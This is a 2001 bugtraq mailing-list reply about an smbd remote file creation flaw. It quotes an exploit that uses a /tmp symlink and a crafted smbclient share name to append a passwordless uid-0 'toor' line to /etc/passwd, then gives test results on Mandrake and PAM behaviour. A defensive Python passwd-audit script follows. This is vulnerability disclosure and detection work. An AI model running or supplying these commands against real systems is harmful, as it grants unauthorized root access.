[21181] in bugtraq
Re: smbd remote file creation vulnerability
daemon@ATHENA.MIT.EDU (maniac@localhost.sk)
Mon Jun 25 12:29:29 2001
From: maniac@localhost.sk
Date: Mon, 25 Jun 2001 00:14:02 +0200
To: bugtraq@securityfocus.com
Cc: Michal Zalewski <lcamtuf@bos.bindview.com>
Message-ID: <20010625001401.A2738@localhost.sk>
Mail-Followup-To: bugtraq@securityfocus.com,
Michal Zalewski <lcamtuf@bos.bindview.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <Pine.LNX.4.21.0106232315510.10682-100000@nimue.bos.bindview.com>; from lcamtuf@bos.bindview.com on Sat, Jun 23, 2001 at 11:24:26PM -0400
> Exploit:
>
> This is the scenario of local privilege escalation attack against
> RedHat 7.x installation:
>
> $ ln -s /etc/passwd /tmp/x.log
>
> $ smbclient //NIMUE/"`perl -e '{print "\ntoor::0:0::/:/bin/sh\n"}'`" \
> -n ../../../tmp/x -N
>
> ...where 'NIMUE' stands for the local host name (a few error messages
> should be returned).
>
> $ su toor
> #
Hi,
Mandrake 7.1 (also Mandrake 8.0 and RedHat 6.2) logs by default to:
/var/log/samba/log.%m
I replaced it with /var/log/samba/%m.log and used your exploit, which
worked: the following line was appended to /etc/passwd:
toor::0:0::/:/bin/sh
But as long as those two spaces were at the beginning of the line, it was
impossible to su to that account; this is the error message:
Jun 24 23:28:55 localhost PAM_pwdb[23844]: check pass; user unknown
I tried to insert \r after the first \n, but unsuccessfully.
I'm using pam-0.72-7mdk.
These versions of PAM also don't permit spaces at the beginning of the line:
pam-0.72-20.6.x (RedHat 6.2)
pam-0.74-6mdk (Mandrake 8.0)
Maybe sshd without PAM support and permitting empty passwords may be
'vulnerable' on such systems.
maniac
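The thread describes what a successful write into /etc/passwd looks like: an appended entry for a second UID-0 account with an empty password field, in one case prefixed with whitespace that PAM then refused to resolve ("user unknown"). The following audit script is an added example, not code from the post or from Samba or PAM; it parses passwd-format text and flags exactly those symptoms so an administrator can check a host after an incident like this one. The sample file contents are constructed for the example, and the `audit_passwd` function name and its reason codes are my own choice.

```python
"""Audit passwd-format entries for the symptoms described in the thread:
an extra uid-0 account, an empty password field, and a line with leading
whitespace that the name-service parser will not resolve.
Added example; not part of the original bugtraq post."""
import re
import sys

# Constructed sample: a normal root entry, a normal user, then an appended
# entry with two leading spaces (the form the post says PAM rejected with
# "user unknown"), then the same entry without the spaces.
SAMPLE_PASSWD = (
    "root:x:0:0:root:/root:/bin/bash\n"
    "alice:x:1000:1000:Alice:/home/alice:/bin/bash\n"
    "  toor::0:0::/:/bin/sh\n"
    "toor::0:0::/:/bin/sh\n"
)

# Conservative account-name syntax; anything outside it is worth a look.
NAME_RE = re.compile(r"^[A-Za-z_][A-Za-z0-9_-]*\$?$")


def audit_passwd(text):
    """Return a list of (line_no, reason_code) findings for suspicious entries.

    Reason codes: leading_whitespace, bad_field_count, bad_name,
    empty_password, bad_uid, uid0_not_root.
    """
    findings = []
    for n, raw in enumerate(text.splitlines(), 1):
        if not raw.strip():
            continue  # blank lines are harmless
        if raw != raw.lstrip():
            # The post reports such a line is not resolvable by PAM; it is
            # still evidence that something appended to the file.
            findings.append((n, "leading_whitespace"))
        fields = raw.strip().split(":")
        if len(fields) != 7:
            findings.append((n, "bad_field_count"))
            continue
        name, pw, uid, _gid, _gecos, _home, _shell = fields
        if not NAME_RE.match(name):
            findings.append((n, "bad_name"))
        if pw == "":
            # Empty second field means "no password required" to a
            # non-shadow-aware login path.
            findings.append((n, "empty_password"))
        if not uid.isdigit():
            findings.append((n, "bad_uid"))
            continue
        if uid == "0" and name != "root":
            findings.append((n, "uid0_not_root"))
    return findings


def audit_file(path):
    """Convenience wrapper: audit a passwd file on disk."""
    with open(path) as fh:
        return audit_passwd(fh.read())


if __name__ == "__main__":
    # With a path argument audit that file; otherwise show the constructed sample.
    if len(sys.argv) > 1:
        results = audit_file(sys.argv[1])
    else:
        results = audit_passwd(SAMPLE_PASSWD)
    for line_no, reason in results:
        print("line %d: %s" % (line_no, reason))
```

Run it as `python audit_passwd.py /etc/passwd` on a host; the sample run reports the third line for leading whitespace, an empty password and a non-root uid 0, and the fourth line for the latter two. The script only reads and reports; remediation (removing the entry, rotating credentials, and changing the `log file` setting so that a client-supplied `%m` cannot steer the log path) is left to the operator.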